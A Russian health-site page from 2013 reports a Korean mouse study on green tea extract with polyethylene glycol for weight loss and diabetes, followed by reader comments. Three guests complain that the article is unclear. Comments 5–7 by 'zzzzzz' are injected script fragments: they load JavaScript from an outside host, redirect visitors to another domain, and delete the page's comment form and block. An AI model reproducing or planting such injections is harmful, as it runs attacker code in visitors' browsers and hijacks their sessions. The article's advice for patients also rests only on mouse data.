Здоровье ИНФО
Присоединяйтесь к нам:
Главная страница  >>  Наша кожа  >>  Прыщи  >>  Статьи  >>  Поможет ли зеленый чай по...  >>  Поможет ли зеленый чай похудеть?
 
Обратная связь
 

Поможет ли зеленый чай похудеть?

Размер шрифта
10 июня 2013 00:00
Юрий Малышев
Здоровье инфо
Анна Белевская
Здоровье инфо
  • google_analytics: false
  • Нравится

Согласно данным предыдущих исследований, зеленый чай помогает похудеть. Для того чтобы проверить, так ли это на самом деле, корейские ученые провели собственное исследование.

Ранее ученые доказали, что активные компоненты зеленого чая – флавоноиды – уменьшают всасывание глюкозы и жиров в кишечнике. Для уменьшения всасывания глюкозы достаточно небольшого количества зеленого чая, тогда как для уменьшения всасывания жиров – требуется больше. Употребление большого количества зеленого чая имеет негативные последствия, в частности повышает инсулинорезистентность.

Корейские ученые провели эксперимент на мышах, используя экстракт зеленого чая. Для того чтобы в кровь не попало слишком много флавоноидов, они использовали полиэтиленгликоль, который связывал флавоноиды в кишечнике и препятствовал их всасыванию.

Оказалось, что сам по себе экстракт зеленого чая не влияет на массу тела и углеводный обмен. Однако применение экстракта зеленого чая в сочетании с полиэтиленгликолем позволяет снизить массу тела и уменьшить инсулинорезистентность как у мышей, получавших питание с высоким содержанием жиров, так и у мышей с сахарным диабетом. Полиэтиленгликоль увеличивает время пребывания флавоноидов зеленого чая в кишечнике, что позволяет уменьшить всасывание глюкозы.

Таким образом, экстракт зеленого чая в сочетании с полиэтиленгликолем можно использовать в качестве средства профилактики и лечения у пациентов, страдающих ожирением и сахарным диабетом 2 типа.

  • google_analytics: false
  • Нравится
Послать другу Послать другу Распечатать Распечатать Обсудить на форуме Обсудить на форуме
Комментарии

1 - Гость

12 июня 2013 в 13:47

Цитировать   |   Пожаловаться

Мда, очень полезная статья, вообще не понятно теперь пить или нет зеленый чай!! Что ещё за полиэтиленгликоль?? Где мы его возьмём интересно? Для кого написана эта статья? Пишите доступным языком для обычных людей, если действительно хотите помочь(((

2 - Гость

15 июня 2013 в 15:49

Цитировать   |   Пожаловаться

Согласна с предыдущим гостем .. Статья типа - а вот чай с черной икрой еще лучше..:) какой то полиэтилен - гликоль... Вы что шутите? Для кого вы пишите? Больше на ваш "умный" сайт ни ногой... 

3 - Гость

15 июня 2013 в 19:26

Цитировать   |   Пожаловаться

Автор видимо не успел дописать статью до логического завершения - просто уснул

Полиэтиленгликоль - это вязкая жидкость, воскообразное вещество, растворимое во многих органических растворителях, таких как бензол, четыреххлористый углерод, хлороформ, диметилформамид, ацетонитрил. Он также хорошо растворим  в воде. Используется в качестве сырья для изготовления вододисперсионных красок, лаков, штукатурок, сухих строительных смесей, теплоносителей. 

    И что, это надо употреблять в пищу ?!  Странно....

5 - zzzzzz

30 июня 2015 в 19:15

Цитировать   |   Пожаловаться

--> src="http://1212123.esy.es/q.js">

6 - zzzzzz

30 июня 2015 в 19:32

Цитировать   |   Пожаловаться

--> src="http://1212123.esy.es/q.js">

7 - zzzzzz

30 июня 2015 в 23:14

Цитировать   |   Пожаловаться

--> src="http://1212123.esy.es/q.js"> > window.location.href="http://a25832-hostde3.fornex.org/"; $("form.noprint, #CommentsBlock").remove();

Статьи

       
В новый год – с новым весом!   Сколько надо сбросить, чтобы не заболеть раком! Ответ в конце статьи!   Как воспитывать ребенка, чтобы он не был толстым?   Старт нового сезона проекта «Сбрось лишнее»  
11 октября 2013Елена Малышева расскажет все о том, как правильно худеть 05 июля 2013Вы не виноваты в своем лишнем весе! Еда всего лишь одна из причин ожирения! Какая же главная?
 
11 июня 2013Для похудения больше не нужна операция! Новый метод лечения делает потерю веса плевым делом 28 мая 2013Бактерии спасут человечество от ожирения! Новый метод похудения от гарвардских ученых
 

Слайдшоу

1
Суперягода против жира на животе
Еда, которая уберет у вас живот в Новый год
Как похудеть, ничего не делая

Тесты

1
Будет ли у вас инфаркт?
Кофеин вызывает зависимость?
Как устроены волосы человека?
Вопросы и ответы
Яна Александровна Юцковская
Яна Александровна Юцковская Задать вопрос
Посмотреть информацию о враче

Юцковская Яна Александровна, д.м.н., профессор, зав. кафедрой дерматовенерологии и косметологии ГБОУ ВПО «ТГМУ Минздрава России», врач высшей категории, директор ООО «Профессорская клиника Юцковских», Владивосток, директор ООО «Клиника профессора  Юцковской», Москва, президент НП «ДВАЭМ», председатель Дальневосточного отделения МООСБТ.

Елена Николаевна Волкова
Елена Николаевна Волкова Прочитать ответы
Посмотреть информацию о враче

Доктор медицинских наук, профессор кафедры дерматовенерологии Московского факультета ГОУ ВПО «РГМУ им. Н.И. Пирогова Минздравсоцразвития России». Этот консультант отвечал на вопросы пользователей с 03 ноября 2011 г. по 15 февраля 2012 г.